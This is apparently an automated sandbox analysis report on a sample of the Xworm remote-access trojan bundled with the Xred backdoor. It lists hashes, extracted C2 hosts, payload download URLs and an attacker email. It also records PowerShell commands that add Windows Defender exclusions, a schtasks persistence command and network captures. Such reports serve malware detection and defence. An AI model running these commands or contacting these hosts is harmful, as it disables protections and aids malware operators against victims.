Analysis

  • max time kernel
    141s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    23/01/2025, 13:53 UTC

General

  • Target

    Xworm.exe

  • Size

    828KB

  • MD5

    f2dba5b93fa78fe0357cae18d68bc13f

  • SHA1

    686e5e1ae65116c4d22315b15992163ad4d34f7c

  • SHA256

    0d8cc0a75238c05e1b072683ee43d7e0bf827dde7a652df1467333a2b1f6a570

  • SHA512

    cc9714c48fc9c36f98ec2230e96efd5016c254059cf23ea7ccf318e3e44337559e6f5f48d5b9367a10c5b87bd05df6345c58c64eb728769f649b2411f4dc3970

  • SSDEEP

    12288:pMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9rR0uvsj:pnsJ39LyjbJkQFMhmC+6GD9Fl0

Malware Config

Extracted

Family

xworm

C2

simply-exotic.gl.at.ply.gg:27183

Attributes
  • Install_directory

    %Temp%

  • install_file

    Windows.exe

Extracted

Family

xred

C2

xred.mooo.com

Attributes
  • email

    xredline1@gmail.com

  • payload_url

    http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

    https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

    https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1

    http://xred.site50.net/syn/SUpdate.ini

    https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download

    https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1

    http://xred.site50.net/syn/Synaptics.rar

    https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download

    https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1

    http://xred.site50.net/syn/SSLLibrary.dll

Signatures

  • Detect Xworm Payload 6 IoCs
  • Xred

    Xred is a backdoor written in Delphi.

  • Xred family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths, and processes.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 3 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\Xworm.exe
    "C:\Users\Admin\AppData\Local\Temp\Xworm.exe"
    1⤵
    • Checks computer location settings
    • Adds Run key to start application
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:5092
    • C:\Users\Admin\AppData\Local\Temp\._cache_Xworm.exe
      "C:\Users\Admin\AppData\Local\Temp\._cache_Xworm.exe"
      2⤵
      • Checks computer location settings
      • Drops startup file
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:532
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\._cache_Xworm.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:844
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '._cache_Xworm.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3960
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\User'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2636
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'User'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2544
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "User" /tr "C:\Users\Admin\AppData\Local\Temp\User"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:4828
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /delete /f /tn "User"
        3⤵
        PID:2268
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpDAFE.tmp.bat""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1524
        • C:\Windows\system32\timeout.exe
          timeout 3
          4⤵
          • Delays execution with timeout.exe
          PID:3172
      • C:\ProgramData\Synaptics\Synaptics.exe
        "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
        2⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:4180
        • C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
          "C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:2884
  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:4872

Network

    • flag-us
      DNS
      58.55.71.13.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      58.55.71.13.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      73.159.190.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      73.159.190.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      3.108.50.23.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      3.108.50.23.in-addr.arpa
      IN PTR
      Response
      3.108.50.23.in-addr.arpa
      IN PTR
      a23-50-108-3.deploy.static.akamaitechnologies.com
    • flag-us
      DNS
      ip-api.com
      ._cache_Xworm.exe
      Remote address:
      8.8.8.8:53
      Request
      ip-api.com
      IN A
      Response
      ip-api.com
      IN A
      208.95.112.1
    • flag-us
      GET
      http://ip-api.com/line/?fields=hosting
      ._cache_Xworm.exe
      Remote address:
      208.95.112.1:80
      Request
      GET /line/?fields=hosting HTTP/1.1
      Host: ip-api.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Thu, 23 Jan 2025 13:54:00 GMT
      Content-Type: text/plain; charset=utf-8
      Content-Length: 6
      Access-Control-Allow-Origin: *
      X-Ttl: 60
      X-Rl: 44
    • flag-us
      DNS
      46.28.109.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      46.28.109.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      1.112.95.208.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      1.112.95.208.in-addr.arpa
      IN PTR
      Response
      1.112.95.208.in-addr.arpa
      IN PTR
      ip-api.com
    • flag-us
      DNS
      xred.mooo.com
      Synaptics.exe
      Remote address:
      8.8.8.8:53
      Request
      xred.mooo.com
      IN A
      Response
    • flag-us
      DNS
      freedns.afraid.org
      Synaptics.exe
      Remote address:
      8.8.8.8:53
      Request
      freedns.afraid.org
      IN A
      Response
      freedns.afraid.org
      IN A
      69.42.215.252
    • flag-us
      GET
      http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
      Synaptics.exe
      Remote address:
      69.42.215.252:80
      Request
      GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
      User-Agent: MyApp
      Host: freedns.afraid.org
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Date: Thu, 23 Jan 2025 13:54:01 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Vary: Accept-Encoding
      X-Cache: MISS
    • flag-us
      DNS
      104.246.116.51.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      104.246.116.51.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      252.215.42.69.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      252.215.42.69.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      252.215.42.69.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      252.215.42.69.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      simply-exotic.gl.at.ply.gg
      ._cache_Xworm.exe
      Remote address:
      8.8.8.8:53
      Request
      simply-exotic.gl.at.ply.gg
      IN A
      Response
      simply-exotic.gl.at.ply.gg
      IN A
      147.185.221.25
    • flag-us
      DNS
      25.221.185.147.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      25.221.185.147.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      241.150.49.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      241.150.49.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      50.23.12.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      50.23.12.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      77.190.18.2.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      77.190.18.2.in-addr.arpa
      IN PTR
      Response
      77.190.18.2.in-addr.arpa
      IN PTR
      a2-18-190-77.deploy.static.akamaitechnologies.com
    • flag-us
      DNS
      docs.google.com
      Synaptics.exe
      Remote address:
      8.8.8.8:53
      Request
      docs.google.com
      IN A
      Response
      docs.google.com
      IN A
      216.58.212.206
    • flag-gb
      GET
      https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      Synaptics.exe
      Remote address:
      216.58.212.206:443
      Request
      GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
      User-Agent: Synaptics.exe
      Host: docs.google.com
      Cache-Control: no-cache
      Response
      HTTP/1.1 303 See Other
      Content-Type: application/binary
      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
      Pragma: no-cache
      Expires: Mon, 01 Jan 1990 00:00:00 GMT
      Date: Thu, 23 Jan 2025 13:55:01 GMT
      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      Strict-Transport-Security: max-age=31536000
      Cross-Origin-Opener-Policy: same-origin
      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
      Content-Security-Policy: script-src 'report-sample' 'nonce-h2oR3qdEH3SnNZgXQmgaMg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
      Server: ESF
      Content-Length: 0
      X-XSS-Protection: 0
      X-Frame-Options: SAMEORIGIN
      X-Content-Type-Options: nosniff
      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    • flag-gb
      GET
      https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      Synaptics.exe
      Remote address:
      216.58.212.206:443
      Request
      GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
      User-Agent: Synaptics.exe
      Host: docs.google.com
      Cache-Control: no-cache
      Cookie: NID=520=qT5TBmR0Ql8DVyR9-AXW6sWpZeC4Gorav6CMLlthzmE4JBzBSaCpmcLZURL8Lymce4OnBzioCBdtbgdDyB1KPKF41RXtnS6ZRfm0oLf7OOY3WO4dWYt_RKCMm6UxfCoCThSVV7ok30YD32e8PC7jhu--95HATx-FIYJn9MxMaw8qej0NL5T5MveBTg
      Response
      HTTP/1.1 303 See Other
      Content-Type: application/binary
      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
      Pragma: no-cache
      Expires: Mon, 01 Jan 1990 00:00:00 GMT
      Date: Thu, 23 Jan 2025 13:55:01 GMT
      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      Strict-Transport-Security: max-age=31536000
      Cross-Origin-Opener-Policy: same-origin
      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
      Content-Security-Policy: script-src 'report-sample' 'nonce-fSRn39ResUQrGTYJTHF4jA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
      Server: ESF
      Content-Length: 0
      X-XSS-Protection: 0
      X-Frame-Options: SAMEORIGIN
      X-Content-Type-Options: nosniff
      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    • flag-gb
      GET
      https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      Synaptics.exe
      Remote address:
      216.58.212.206:443
      Request
      GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
      User-Agent: Synaptics.exe
      Host: docs.google.com
      Cache-Control: no-cache
      Cookie: NID=520=qT5TBmR0Ql8DVyR9-AXW6sWpZeC4Gorav6CMLlthzmE4JBzBSaCpmcLZURL8Lymce4OnBzioCBdtbgdDyB1KPKF41RXtnS6ZRfm0oLf7OOY3WO4dWYt_RKCMm6UxfCoCThSVV7ok30YD32e8PC7jhu--95HATx-FIYJn9MxMaw8qej0NL5T5MveBTg
      Response
      HTTP/1.1 303 See Other
      Content-Type: application/binary
      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
      Pragma: no-cache
      Expires: Mon, 01 Jan 1990 00:00:00 GMT
      Date: Thu, 23 Jan 2025 13:55:01 GMT
      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      Strict-Transport-Security: max-age=31536000
      Content-Security-Policy: script-src 'report-sample' 'nonce-JjYuTwwnQILOysQP6gEPig' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      Cross-Origin-Opener-Policy: same-origin
      Server: ESF
      Content-Length: 0
      X-XSS-Protection: 0
      X-Frame-Options: SAMEORIGIN
      X-Content-Type-Options: nosniff
      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    • flag-us
      DNS
      c.pki.goog
      Synaptics.exe
      Remote address:
      8.8.8.8:53
      Request
      c.pki.goog
      IN A
      Response
      c.pki.goog
      IN CNAME
      pki-goog.l.google.com
      pki-goog.l.google.com
      IN A
      142.250.187.227
    • flag-gb
      GET
      http://c.pki.goog/r/r1.crl
      Synaptics.exe
      Remote address:
      142.250.187.227:80
      Request
      GET /r/r1.crl HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      User-Agent: Microsoft-CryptoAPI/10.0
      Host: c.pki.goog
      Response
      HTTP/1.1 200 OK
      Accept-Ranges: bytes
      Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
      Cross-Origin-Resource-Policy: cross-origin
      Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
      Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
      Content-Length: 854
      X-Content-Type-Options: nosniff
      Server: sffe
      X-XSS-Protection: 0
      Date: Thu, 23 Jan 2025 13:34:28 GMT
      Expires: Thu, 23 Jan 2025 14:24:28 GMT
      Cache-Control: public, max-age=3000
      Age: 1232
      Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
      Content-Type: application/pkix-crl
      Vary: Accept-Encoding
    • flag-us
      DNS
      o.pki.goog
      Synaptics.exe
      Remote address:
      8.8.8.8:53
      Request
      o.pki.goog
      IN A
      Response
      o.pki.goog
      IN CNAME
      pki-goog.l.google.com
      pki-goog.l.google.com
      IN A
      142.250.187.227
    • flag-gb
      GET
      http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDREXAZkIcRFgn9FoWvtnQ0
      Synaptics.exe
      Remote address:
      142.250.187.227:80
      Request
      GET /wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDREXAZkIcRFgn9FoWvtnQ0 HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      User-Agent: Microsoft-CryptoAPI/10.0
      Host: o.pki.goog
      Response
      HTTP/1.1 200 OK
      Server: ocsp_responder
      Content-Length: 472
      X-XSS-Protection: 0
      X-Frame-Options: SAMEORIGIN
      Date: Thu, 23 Jan 2025 13:51:16 GMT
      Cache-Control: public, max-age=14400
      Content-Type: application/ocsp-response
      Age: 224
    • flag-gb
      GET
      http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQCtrC6LRgin8QlSmIIYAEvj
      Synaptics.exe
      Remote address:
      142.250.187.227:80
      Request
      GET /wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQCtrC6LRgin8QlSmIIYAEvj HTTP/1.1
      Connection: Keep-Alive
      Accept: */*
      User-Agent: Microsoft-CryptoAPI/10.0
      Host: o.pki.goog
      Response
      HTTP/1.1 200 OK
      Server: ocsp_responder
      Content-Length: 472
      X-XSS-Protection: 0
      X-Frame-Options: SAMEORIGIN
      Date: Thu, 23 Jan 2025 13:37:30 GMT
      Cache-Control: public, max-age=14400
      Content-Type: application/ocsp-response
      Age: 1051
    • flag-us
      DNS
      drive.usercontent.google.com
      Synaptics.exe
      Remote address:
      8.8.8.8:53
      Request
      drive.usercontent.google.com
      IN A
      Response
      drive.usercontent.google.com
      IN A
      216.58.204.65
    • flag-gb
      GET
      https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      Synaptics.exe
      Remote address:
      216.58.204.65:443
      Request
      GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
      User-Agent: Synaptics.exe
      Cache-Control: no-cache
      Host: drive.usercontent.google.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 404 Not Found
      X-GUploader-UploadID: AFIdbgQlvoqyjjaSxU-xGklzde1XHMvWtL5givXFcqqHNNKl9eAg-bh4BM5jER_VwM3RAbZQJwZ_KGI
      Content-Type: text/html; charset=utf-8
      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
      Pragma: no-cache
      Expires: Mon, 01 Jan 1990 00:00:00 GMT
      Date: Thu, 23 Jan 2025 13:55:01 GMT
      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
      Content-Security-Policy: script-src 'report-sample' 'nonce-49BmgsfRwXCqoVATO6XLHg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
      Cross-Origin-Opener-Policy: same-origin
      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
      Content-Length: 1652
      Server: UploadServer
      Set-Cookie: NID=520=qT5TBmR0Ql8DVyR9-AXW6sWpZeC4Gorav6CMLlthzmE4JBzBSaCpmcLZURL8Lymce4OnBzioCBdtbgdDyB1KPKF41RXtnS6ZRfm0oLf7OOY3WO4dWYt_RKCMm6UxfCoCThSVV7ok30YD32e8PC7jhu--95HATx-FIYJn9MxMaw8qej0NL5T5MveBTg; expires=Fri, 25-Jul-2025 13:55:01 GMT; path=/; domain=.google.com; HttpOnly
      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
      Content-Security-Policy: sandbox allow-scripts
    • flag-gb
      GET
      https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      Synaptics.exe
      Remote address:
      216.58.204.65:443
      Request
      GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
      User-Agent: Synaptics.exe
      Cache-Control: no-cache
      Host: drive.usercontent.google.com
      Connection: Keep-Alive
      Cookie: NID=520=qT5TBmR0Ql8DVyR9-AXW6sWpZeC4Gorav6CMLlthzmE4JBzBSaCpmcLZURL8Lymce4OnBzioCBdtbgdDyB1KPKF41RXtnS6ZRfm0oLf7OOY3WO4dWYt_RKCMm6UxfCoCThSVV7ok30YD32e8PC7jhu--95HATx-FIYJn9MxMaw8qej0NL5T5MveBTg
      Response
      HTTP/1.1 404 Not Found
      X-GUploader-UploadID: AFIdbgQEh_70GHVAFB4RrTNCw_l7uJyjeFUbv6zkEthG1JxdJG708hWTIlUev2YR4RvYMfki6Wtvuro
      Content-Type: text/html; charset=utf-8
      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
      Pragma: no-cache
      Expires: Mon, 01 Jan 1990 00:00:00 GMT
      Date: Thu, 23 Jan 2025 13:55:01 GMT
      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
      Content-Security-Policy: script-src 'report-sample' 'nonce-ElEm-gKodoEMgL6uqbVfbQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
      Cross-Origin-Opener-Policy: same-origin
      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      Content-Length: 1652
      Server: UploadServer
      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
      Content-Security-Policy: sandbox allow-scripts
    • flag-gb
      GET
      https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
      Synaptics.exe
      Remote address:
      216.58.204.65:443
      Request
      GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
      User-Agent: Synaptics.exe
      Cache-Control: no-cache
      Host: drive.usercontent.google.com
      Connection: Keep-Alive
      Cookie: NID=520=qT5TBmR0Ql8DVyR9-AXW6sWpZeC4Gorav6CMLlthzmE4JBzBSaCpmcLZURL8Lymce4OnBzioCBdtbgdDyB1KPKF41RXtnS6ZRfm0oLf7OOY3WO4dWYt_RKCMm6UxfCoCThSVV7ok30YD32e8PC7jhu--95HATx-FIYJn9MxMaw8qej0NL5T5MveBTg
      Response
      HTTP/1.1 404 Not Found
      X-GUploader-UploadID: AFIdbgRpt7Ki3cy0jnmum68tPJhFnBifpNY2cKIBdzjzWGopI4vai1ZkhuRMAtPTvcrwSv3lyDYKRTw
      Content-Type: text/html; charset=utf-8
      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
      Pragma: no-cache
      Expires: Mon, 01 Jan 1990 00:00:00 GMT
      Date: Thu, 23 Jan 2025 13:55:02 GMT
      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      Content-Security-Policy: script-src 'report-sample' 'nonce-LUNYKZQ3DSmOu5AcrdxiIQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
      Cross-Origin-Opener-Policy: same-origin
      Content-Length: 1652
      Server: UploadServer
      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
      Content-Security-Policy: sandbox allow-scripts
    • flag-us
      DNS
      206.212.58.216.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      206.212.58.216.in-addr.arpa
      IN PTR
      Response
      206.212.58.216.in-addr.arpa
      IN PTR
      ams16s21-in-f14.1e100.net
      206.212.58.216.in-addr.arpa
      IN PTR
      lhr25s27-in-f14.1e100.net
      206.212.58.216.in-addr.arpa
      IN PTR
      ams16s21-in-f206.1e100.net
    • flag-us
      DNS
      227.187.250.142.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      227.187.250.142.in-addr.arpa
      IN PTR
      Response
      227.187.250.142.in-addr.arpa
      IN PTR
      lhr25s34-in-f3.1e100.net
    • flag-us
      DNS
      65.204.58.216.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      65.204.58.216.in-addr.arpa
      IN PTR
      Response
      65.204.58.216.in-addr.arpa
      IN PTR
      lhr48s49-in-f1.1e100.net
      65.204.58.216.in-addr.arpa
      IN PTR
      lhr25s13-in-f1.1e100.net
